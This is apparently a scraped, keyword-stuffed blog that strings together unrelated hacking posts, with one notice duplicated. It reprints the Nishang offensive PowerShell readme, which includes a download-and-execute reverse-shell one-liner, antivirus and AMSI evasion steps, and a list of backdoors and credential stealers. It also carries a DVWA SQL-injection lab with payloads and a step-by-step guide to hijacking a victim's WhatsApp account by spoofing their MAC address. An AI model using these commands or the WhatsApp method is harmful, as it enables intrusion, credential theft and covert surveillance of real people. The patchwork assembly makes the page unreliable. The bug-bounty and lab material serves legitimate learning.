viernes, 22 de mayo de 2020

How Do I Get Started With Bug Bounty ?

How do I get started with bug bounty hunting? How do I improve my skills?



These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.


Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

Continue reading

  1. Como Empezar A Hackear
  2. Hacking Net
  3. Elhacker Ip
  4. Como Empezar En El Hacking
  5. Hacking The Art Of Exploitation
  6. Hacking Traduccion
  7. Hacking Etico Libro
  8. Manual Del Hacker
  9. Como Hacer Hacker
  10. Growth Hacking Que Es
  11. El Hacker Pelicula
  12. Master Growth Hacking
  13. Libro Hacker
  14. Tools Hacking
  15. Mindset Hacking Español
  16. Hacking Attacks

Files Download Information




After 7 years of Contagio existence, Google Safe Browsing services notified Mediafire (hoster of Contagio and Contagiominidump files) that "harmful" content is hosted on my Mediafire account.

It is harmful only if you harm your own pc and but not suitable for distribution or infecting unsuspecting users but I have not been able to resolve this with Google and Mediafire.

Mediafire suspended public access to Contagio account.

The file hosting will be moved.

If you need any files now, email me the posted Mediafire links (address in profile) and I will pull out the files and share via other methods.

P.S. I have not been able to resolve "yet" because it just happened today, not because they refuse to help.  I don't want to affect Mediafire safety reputation and most likely will have to move out this time.

The main challenge is not to find hosting, it is not difficult and I can pay for it, but the effort move all files and fix the existing links on the Blogpost, and there are many. I planned to move out long time ago but did not have time for it. If anyone can suggest how to change all Blogspot links in bulk, I will be happy.


P.P.S. Feb. 24 - The files will be moved to a Dropbox Business account and shared from there (Dropbox team confirmed they can host it )  


The transition will take some time, so email me links to what you need. 

Thank you all
M
Related links
  1. Hacker Pelicula
  2. Javascript Hacking
  3. Paginas Para Hackear
  4. Hacking Life
  5. Growth Hacking Barcelona

jueves, 21 de mayo de 2020

Nishang - Offensive PowerShell For Red Team, Penetration Testing And Offensive Security


Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
By nikhil_mitt

Usage
Import all the scripts in the current PowerShell session (PowerShell v3 onwards).
PS C:\nishang> Import-Module .\nishang.psm1
Use the individual scripts with dot sourcing.
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information
To get help about any script or function, use:
PS C:\nishang> Get-Help [scriptname] -full
Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.
For example, to see the help about Get-WLAN-Keys.ps1, use
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Anti Virus
Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]
Method 2. Use the -encodedcommand (or -e) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".
Encode the scrript using Invoke-Encode from Nishang:
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt
From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:
C:\Users\target> powershell -e [encodedscript]
If the scripts still get detected changing the function and parameter names and removing the help content will help.
In case Windows 10's AMSI is still blocking script execution, see this blog: http://www.labofapenetrationtester.com/2016/09/amsi.html

Scripts
Nishang currently contains the following scripts and payloads.

ActiveDirectory
Set-DCShadowPermissions
Modify AD objects to provide minimal permissions required for DCShadow.

Antak - the Webshell
Antak
Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

Backdoors
HTTP-Backdoor
A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
DNS_TXT_Pwnage
A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
Execute-OnTime
A backdoor which can execute PowerShell scripts at a given time on a target.
Gupt-Backdoor
A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
Add-ScrnSaveBackdoor
A backdoor which can use Windows screen saver for remote command and script execution.
Invoke-ADSBackdoor
A backdoor which can use alternate data streams and Windows Registry to achieve persistence.
Add-RegBackdoor
A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).
Set-RemoteWMI
Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
Set-RemotePSRemoting
Modify permissions of PowerShell remoting to allow access to a non-admin user.

Bypass
Invoke-AmsiBypass
Implementation of publicly known methods to bypass/avoid AMSI.

Client
Out-CHM
Create infected CHM files which can execute PowerShell commands and scripts.
Out-Word
Create Word files and infect existing ones to run PowerShell commands and scripts.
Out-Excel
Create Excel files and infect existing ones to run PowerShell commands and scripts.
Out-HTA
Create a HTA file which can be deployed on a web server and used in phishing campaigns.
Out-Java
Create signed JAR files which can be used with applets for script and command execution.
Out-Shortcut
Create shortcut files capable of executing PowerShell commands and scripts.
Out-WebQuery
Create IQY files for phishing credentials and SMB hashes.
Out-JS
Create JS files capable of executing PowerShell commands and scripts.
Out-SCT
Create SCT files capable of executing PowerShell commands and scripts.
Out-SCF
Create a SCF file which can be used for capturing NTLM hash challenges.

Escalation
Enable-DuplicateToken
When SYSTEM privileges are required.
Remove-Update
Introduce vulnerabilities by removing patches.
Invoke-PsUACme
Bypass UAC.

Execution
Download-Execute-PS
Download and execute a PowerShell script in memory.
Download_Execute
Download an executable in text format, convert it to an executable, and execute.
Execute-Command-MSSQL
Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
Execute-DNSTXT-Code
Execute shellcode in memory using DNS TXT queries.
Out-RundllCommand
Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.

Gather
Check-VM
Check for a virtual machine.
Copy-VSS
Copy the SAM file using Volume Shadow Copy Service.
Invoke-CredentialsPhish
Trick a user into giving credentials in plain text.
FireBuster FireListener
A pair of scripts for egress testing
Get-Information
Get juicy information from a target.
Get-LSASecret
Get LSA Secret from a target.
Get-PassHashes
Get password hashes from a target.
Get-WLAN-Keys
Get WLAN keys in plain text from a target.
Keylogger
Log keystrokes from a target.
Invoke-MimikatzWdigestDowngrade
Dump user passwords in plain on Windows 8.1 and Server 2012
Get-PassHints
Get password hints of Windows users from a target.
Show-TargetScreen
Connect back and Stream target screen using MJPEG.
Invoke-Mimikatz
Load mimikatz in memory. Updated and with some customisation.
Invoke-Mimikittenz
Extract juicy information from target process (like browsers) memory using regex.
Invoke-SSIDExfil
Exfiltrate information like user credentials, using WLAN SSID.
Invoke-SessionGopher
Identify admin jump-boxes and/or computers used to access Unix machines.

MITM
Invoke-Interceptor
A local HTTPS proxy for MITM attacks.

Pivot
Create-MultipleSessions
Check credentials on multiple computers and create PSSessions.
Run-EXEonRemote Copy and execute an executable on multiple machines.
Invoke-NetworkRelay Create network relays between computers.

Prasadhak
Prasadhak
Check running hashes of running process against the VirusTotal database.

Scan
Brute-Force
Brute force FTP, Active Directory, MSSQL, and Sharepoint.
Port-Scan
A handy port scanner.

Powerpreter
Powerpreter
All the functionality of nishang in a single script module.

Shells
Invoke-PsGcat
Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
Invoke-PsGcatAgent
Execute commands and scripts sent by Invoke-PsGcat.
Invoke-PowerShellTcp
An interactive PowerShell reverse connect or bind shell
Invoke-PowerShellTcpOneLine
Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
Invoke-PowerShellTcpOneLineBind
Bind version of Invoke-PowerShellTcpOneLine.
Invoke-PowerShellUdp
An interactive PowerShell reverse connect or bind shell over UDP
Invoke-PowerShellUdpOneLine
Stripped down version of Invoke-PowerShellUdp.
Invoke-PoshRatHttps
Reverse interactive PowerShell over HTTPS.
Invoke-PoshRatHttp
Reverse interactive PowerShell over HTTP.
Remove-PoshRat
Clean the system after using Invoke-PoshRatHttps
Invoke-PowerShellWmi
Interactive PowerShell using WMI.
Invoke-PowerShellIcmp
An interactive PowerShell reverse shell over ICMP.
Invoke-JSRatRundll
An interactive PowerShell reverse shell over HTTP using rundll32.exe.
Invoke-JSRatRegsvr
An interactive PowerShell reverse shell over HTTP using regsvr32.exe.

Utility
Add-Exfiltration
Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
Add-Persistence
Add reboot persistence capability to a script.
Remove-Persistence
Remote persistence added by the Add-Persistence script.
Do-Exfiltration
Pipe (|) this to any script to exfiltrate the output.
Download
Transfer a file to the target.
Parse_Keys
Parse keys logged by the keylogger.
Invoke-Encode
Encode and compress a script or string.
Invoke-Decode
Decode and decompress a script or string from Invoke-Encode.
Start-CaptureServer
Run a web server which logs Basic authentication and SMB hashes.
ConvertTo-ROT13
Encode a string to ROT13 or decode a ROT13 string.
Out-DnsTxt
Generate DNS TXT records which could be used with other scripts.
[Base64ToString]
[StringToBase64]
[ExetoText]
[TexttoExe]

Updates
Updates about Nishang can be found at my blog http://labofapenetrationtester.com and my Twitter feed @nikhil_mitt.

Bugs, Feedback and Feature Requests
Please raise an issue if you encounter a bug or have a feature request. You can email me at nikhil [dot] uitrgpv at gmail.com

Blog Posts
Some helpful blog posts to check out for beginners:
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html
http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html
http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html
All posts about Nishang:
http://www.labofapenetrationtester.com/search/label/Nishang




via KitPloit

Related articles


HOW TO HACK WHATSAPP ACCOUNT? – WHATSAPP HACK

In the last article, I have discussed a method on WhatsApp hack using SpyStealth Premium App. Today I am gonna show you an advanced method to hack WhatsApp account by mac spoofing. It's a bit more complicated than the last method discussed and requires proper attention. It involves the spoofing of the mac address of the target device. Let's move on how to perform the attack.

SO, HOW TO HACK WHATSAPP ACCOUNT?                                                          

STEP TO FOLLOW FOR WHATSAPP HACK

Here I will show you complete tutorial step by step of hacking WhatsApp account. Just understand each step carefully so this WhatsApp hack could work great.
  1. Find out the victim's phone and note down it's Mac address. To get the mac address in Android devices, go to Settings > About Phone > Status > Wifi Mac address. And here you'll see the mac address. Just write it somewhere. We'll use it in the upcoming steps.
  2. As you get the target's mac address, you have to change your phone's mac address with the target's mac address. Perform the steps mentioned in this article on how to spoof mac address in android phones.
  3. Now install WhatsApp on your phone and use victim's number while you're creating an account. It'll send a verification code to victim's phone. Just grab the code and enter it here.
  4. Once you do that, it'll set all and you'll get all chats and messages which victims sends or receives.
This method is really a good one but a little difficult for the non-technical users. Only use this method if you're technical skills and have time to perform every step carefully. Otherwise, you can hack WhatsApp account using Spying app.
If you want to know how to be on the safer edge from WhatsApp hack, you can follow this article how to protect WhatsApp from being hacked.

Read more


PHoss: A Password Sniffer


"PHoss is a sniffer. A normal sniffer software is designed to find problems in data communication on the network. PHoss is designed to know some protocols which use (or may use) clear text passwords. Many protocols are designed to use secure authentication. For fallback they define a lowest level of authentication using clear text. Many companies use this lowest fallback definition as standard setting to make the product working in many environments." read more...

Download: http://www.phenoelit-us.org/phoss/download.html

More information

  1. Geekprank Hacking
  2. Whatsapp Hacking
  3. Hacking Team
  4. Hacking Etico 101 Pdf
  5. Hacking Course
  6. Hacking Etico Curso Gratis
  7. Hacking Apps
  8. Hacking Curso
  9. Hacking Games Online
  10. Hacking Con Buscadores
  11. Hacking Hardware Tools
  12. Herramientas De Seguridad Informatica
  13. Growth Hacking Madrid
  14. Live Hacking
  15. Black Hacker

Files Download Information




After 7 years of Contagio existence, Google Safe Browsing services notified Mediafire (hoster of Contagio and Contagiominidump files) that "harmful" content is hosted on my Mediafire account.

It is harmful only if you harm your own pc and but not suitable for distribution or infecting unsuspecting users but I have not been able to resolve this with Google and Mediafire.

Mediafire suspended public access to Contagio account.

The file hosting will be moved.

If you need any files now, email me the posted Mediafire links (address in profile) and I will pull out the files and share via other methods.

P.S. I have not been able to resolve "yet" because it just happened today, not because they refuse to help.  I don't want to affect Mediafire safety reputation and most likely will have to move out this time.

The main challenge is not to find hosting, it is not difficult and I can pay for it, but the effort move all files and fix the existing links on the Blogpost, and there are many. I planned to move out long time ago but did not have time for it. If anyone can suggest how to change all Blogspot links in bulk, I will be happy.


P.P.S. Feb. 24 - The files will be moved to a Dropbox Business account and shared from there (Dropbox team confirmed they can host it )  


The transition will take some time, so email me links to what you need. 

Thank you all
M

Related news


  1. Growth Hacking Instagram
  2. Curso De Ciberseguridad Y Hacking Ético
  3. Hacking Background
  4. Foro Hacking
  5. Herramientas Hacking Etico
  6. Web Hacking 101
  7. Libros Hacking Pdf
  8. Curso De Hacking Etico

miércoles, 20 de mayo de 2020

Learning Web Pentesting With DVWA Part 2: SQL Injection

In the last article Learning Web Pentesting With DVWA Part 1: Installation, you were given a glimpse of SQL injection when we installed the DVWA app. In this article we will explain what we did at the end of that article and much more.
Lets start by defining what SQL injection is, OWASP defines it as: "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
Which basically means that we can use a simple (vulnerable) input field in our web application to get information from the database of the server which hosts the web application. We can command and control (at certain times) the database of the web application or even the server.
In this article we are going to perform SQL injection attack on DVWA, so let's jump in. On the DVWA welcome page click on SQL Injection navigation link. We are presented with a page with an input field for User ID.
Now lets try to input a value like 1 in the input field. We can see a response from server telling us the firstname and surname of the user associated with User ID 1.
If we try to enter a user id which doesn't exist, we get no data back from the server. To determine whether an input field is vulnerable to SQL injection, we first start by sending a single quote (') as input. Which returns an SQL error.
We saw this in the previous article and we also talked about injection point in it. Before diving deeper into how this vulnerability can be exploited lets try to understand how this error might have occurred. Lets try to build the SQL query that the server might be trying to execute. Say the query looks something like this:
SELECT first_name, sur_name FROM users WHERE user_id = '1';
The 1 in this query is the value supplied by the user in the User ID input field. When we input a single quote in the User ID input field, the query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = ''';
The quotes around the input provided in the User ID input field are from the server side application code. The error is due to the extra single quote present in the query. Now if we specify a comment after the single quote like this:
'-- -
or
'#
we should get no error. Now our crafted query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = ''-- -';
or
SELECT first_name, sur_name FROM users WHERE user_id = ''#';
since everything after the # or -- - are commented out, the query will ignore the extra single quote added by the server side app and whatever comes after it and will not generate any error. However the query returns nothing because we specified nothing ('') as the user_id.
After knowing how things might be working on the server side, we will start to attack the application.
First of all we will try to determine the number of columns that the query outputs because if we try a query which will output the number of columns greater or smaller than what the original query outputs then our query is going to get an error. So we will first figure out the exact number of columns that the query outputs and we will do that with the help of order by sql statement like this:
' order by 1-- -
This MySQL server might execute the query as:
SELECT first_name, sur_name FROM users WHERE user_id = '' order by 1-- -';
you get the idea now.
if we don't get any error message, we will increase the number to 2 like this:
' order by 2-- -
still no error message, lets add another:
' order by 3-- -
and there we go we have an error message. Which tells us the number of columns that the server query selects is 2 because it erred out at 3.
Now lets use the union select SQL statement to get information about the database itself.
' union select null, version()-- -
You should first understand what a union select statement does and only then can you understand what we are doing here. You can read about it here.
We have used null as one column since we need to match the number of columns from the server query which is two. null will act as a dummy column here which will give no output and the second column which in our case here is the version() command will output the database version. Notice the output from the application, nothing is shown for First name since we specified null for it and the maria db version will be displayed in Surname.
Now lets check who the database user is using the user() function of mariadb:
' union select null, user()-- -
After clicking the submit button you should be able to see the user of the database in surname.

Now lets get some information about the databases in the database.
Lets determine the names of databases from INFORMATION_SCHEMA.SCHEMATA by entering following input in the User ID field:
' union select null, SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA-- -
This lists two databases dvwa and information_schema. information_schema is the built in database. Lets look at the dvwa database.
Get table names for dvwa database from INFORMATION_SCHEMA.TABLES
' union select null, TABLE_NAME from INFORMATION_SCHEMA.TABLES-- -
It gives a huge number of tables that are present in dvwa database. But what we are really interested in is the users table as it is most likely to contain user passwords. But first we need to determine columns of that table and we will do that by querying INFORMATION_SCHEMA.COLUMNS like this:
' union select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- -

We can see the password column in the output now lets get those passwords:
' union select user, password from users-- -
Of-course those are the hashes and not plain text passwords. You need to crack them.
Hope you learned something about SQL injection in this article. See you next time.

References:

1. SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
2. MySQL UNION: https://www.mysqltutorial.org/sql-union-mysql.aspx
3. Chapter 25 INFORMATION_SCHEMA Tables: https://dev.mysql.com/doc/refman/8.0/en/information-schema.html
Read more

WHAT IS ETHICAL HACKING

What is ethical hacking?

Ethical hacking is identifying weakness in computer system and/or computer networks and coming with countermeasures that protect the weakness.

Ethical hackers must abide by the following rules-
1-Get written permission from the owner of the computer system and/or computer network before  hacking.
2-Protect the privacy of the organisation been hacked etc.

Ethical Hacking and Ethical Hacker are terms used to describe hacking performed by a company or individual to help identity potential threats on a computer or network.
 

An Ethical Hacker attempts to byepass system security and search for any weak point that could be exploited by Malicious Hackers.
Related posts

Linux Command Line Hackery Series: Part 2



Welcome back to Linux Command Line Hackery, yes this is Part 2 and today we are going to learn some new skills. Let's rock

Let us first recap what we did in Part 1, if you are not sure what the following commands do then you should read Part 1.

mkdir myfiles                                                # make a directory (folder) with myfiles as name
cd myfiles                                                      # navigate to myfiles folder
touch file1 file2 file3                                    # create three empty files file1file2file3
ls -l                                                                   # view contents of current directory
echo This is file1 > file1                               # write a line of text to file1
cat file1                                                           # display contents of file1
echo This is another line in file1 >> file1    # append another line of text to file1
cat file1                                                          # display the modified content of file1

Command:  cp
Syntax:        cp source1 [source2 ...] destination
Function:     cp stands for copy. cp is used to copy a file from source to destination. Some important flags are mentioned below
Flags:          -r copy directories recursively
                     -f if an existing destination file cannot be opened, remove it and try  again

Let us make a copy of file1 using the new cp command:

cp file1 file1.bak

what this command is going to do is simply copy file1 to another file named file1.bak. You can name the destination file anything you want.
Say, you have to copy file1 to a different folder maybe to home directory how can we do that? well we can do that like this:

cp file /home/user/

I've used the absolute path here you can use whatever you like.
[Trick: ~ has a special meaning, it stands for logged in user's directory. You could have written previous command simply as
cp file1 ~/
and it would have done the same thing.]
Now you want to create a new directory in myfiles directory with the name backup and store all files of myfiles directory in the backup directory. Let's try it:

mkdir backup
cp file1 file2 file3 backup/

this command will copy file1 file2 file3 to backup directory.
We can copy multiple files using cp by specifying the directory to which files must be copied at the end.
We can also copy whole directory and all files and sub-directories in a directory using cp. In order to make a backup copy of myfiles directory and all of it's contents we will type:

cd ..                                           # navigate to previous directory
cp -r myfiles myfiles.bak       # recursively copy all contents of myfiles directory to myfiles.bak directory

This command will copy myfiles directory to myfiles.bak directory including all files and sub-directories

Command: mv
Syntax:       mv source1 [source2 ...] destination
Function:    mv stands for move. It is used for moving files from one place to another (cut/paste in GUI) and also for renaming the files.

If we want to rename our file1 to  file1.old in our myfiles folder we'll do the follow:

cd myfiles                                      # navigate first to myfiles folder
mv file1 file1.old

this command will rename the file1 to file1.old (it really has got so old now). Now say we want to create a new file1 file in our myfiles folder and move the file1.old file to our backup folder:

mv file1.old backup/                    # move (cut/paste) the file1.old file to backup directory
touch file1                                    # create a new file called file1
echo New file1 here > file1         # echo some content into file1

Command:  rmdir
Syntax: rmdir directory_name
Function: rmdir stands for remove directory. It is used for removing empty directories.

Let's create an empty directory in our myfiles directory called 'garbage' and then remove it using rmdir:

mkdir garbage
rmdir  garbage

Good practice keep it doing. (*_*)
But wait a second, I said empty directory! does it mean I cannot delete a directory which has contents in it (files and sub-directories) with rmdir? Yes!, you cannot do that with rmdir
So how am I gonna do that, well keep reading...

Command:  rm
Syntax:        rm FILE...
Function:     rm stands for remove. It is used to remove files and directories. Some of it's important flags are enlisted below.
Flags:          -r remove directories and their contents recursively
                     -f ignore nonexistent files and arguments, never prompt

Now let's say we want to delete the file file1.old in backup folder. Here is how we will do that:

rm backup/file1.old                # using relative path here

Boom! the file is gone. Keep in mind one thing when using rm "IT IS DESTRUCTIVE!". No I'm not yelling at you, I'm just warning you that when you use rm to delete a file it doesn't go to Trash (or Recycle Bin). Rather it is deleted and you cannot get it back (unless you use some special tools quickly). So don't try this at home. I'm just kidding but yes try it cautiously otherwise you are going to loose something important.

Did You said that we can delete directory as well with rm? Yes!, I did. You can delete a directory and all of it's contents with rm by just typing:

rm -r directory_name

Maybe we want to delete backup directory from our myfiles directory, just do this:

rm -r backup

And it is gone now.
Remember what I said about rm, use it with cautious and use rm -r more cautiously (believe me it costs a lot). -r flag will remove not just the files in directory it will also remove any sub-directories in that directory and there respective contents as well.

That is it for this article. I've said that I'll make each article short so that It can be learned quickly and remembered for longer time. I don't wanna bore you.
Read more

  1. Phishing Hacking
  2. El Mejor Hacker
  3. Hacking Etico Libro